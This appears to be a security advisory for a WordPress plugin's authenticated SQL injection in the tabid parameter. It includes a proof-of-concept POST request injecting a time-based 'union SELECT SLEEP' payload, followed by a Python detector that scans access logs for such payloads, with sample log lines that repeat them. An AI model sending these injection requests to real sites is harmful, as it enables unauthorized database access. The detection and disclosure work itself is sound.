The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Cookie: [admin+]

plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes
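
For detection, the following added example (not part of the original advisory and not the plugin's code) scans web access logs for requests to page=plugin-logic whose tabid is not a plain identifier. The allowlist pattern, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Assumption: legitimate tabid values are short identifiers (letters, digits, _ and -).
SAFE_TABID = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/network/plugins.php?page=plugin-logic&tabid=options HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2520union%2520SELECT HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/plugins.php?page=other-plugin&tabid=a%20b HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so a value is judged in its final form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tabid(log_line):
    """Return the decoded tabid when the line targets page=plugin-logic with a
    tabid outside the allowlist; return None otherwise."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if "plugin-logic" not in query.get("page", []):
        return None
    for raw in query.get("tabid", []):
        value = fully_decode(raw)  # parse_qs has already decoded once
        if not SAFE_TABID.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (1-based line number, decoded tabid) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_tabid(line)
        if value is not None:
            hits.append((number, value))
    return hits
```

Because the issue requires an authenticated high-privilege session, a hit is worth correlating with the admin account and source address that made the request.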